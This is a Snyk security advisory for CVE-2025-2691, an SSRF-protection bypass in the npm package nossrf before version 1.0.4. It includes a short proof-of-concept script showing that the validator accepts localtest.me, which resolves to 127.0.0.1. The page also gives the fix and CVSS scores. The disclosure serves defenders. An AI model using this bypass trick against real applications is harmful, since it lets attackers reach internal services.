| Snyk

Threat Intelligence

Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Server-Side Request Forgery (SSRF) vulnerabilities in an interactive lesson.

Start learning

Snyk IDSNYK-JS-NOSSRF-9510842
published23 Mar 2025
disclosed23 Mar 2025
creditLiran Tal

Report a new vulnerability Found a mistake?

Introduced: 23 Mar 2025

NewCVE-2025-2691 (opens in a new tab) CWE-918 (opens in a new tab) First added by Snyk

How to fix?

Upgrade nossrf to version 1.0.4 or higher.

Overview

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF) where an attacker can provide a hostname that resolves to a local or reserved IP address space and bypass the SSRF protection mechanism.

PoC

Define an app.js file with the programmatic API of nossrf as follows:

const nossrf = require("nossrf")
const main = async()=>
{
    let is_safe =  await nossrf.asyncValidateUrl("https://google.com") // true means good
    console.log(is_safe)

let is_safe2 =  await nossrf.asyncValidateUrl(&quot;https://localtest.me&quot;) // true means good
console.log(is_safe2)

}
main()

Run the app.js file
Validate that the localtest.me hostname resolves to a local IP address space 127.0.0.1 and the SSRF protection mechanism is bypassed since for both of the two URLs the response is true

CVSS Base Scores

version 4.0

version 3.1

Attack Vector (AV)
Network
Attack Complexity (AC)
Low
Attack Requirements (AT)
None
Privileges Required (PR)
None
User Interaction (UI)
None

Confidentiality (VC)
High
Integrity (VI)
Low
Availability (VA)
None

Confidentiality (SC)
None
Integrity (SI)
None
Availability (SA)
None

Server-Side Request Forgery (SSRF) Affecting nossrf package, versions <1.0.4

Severity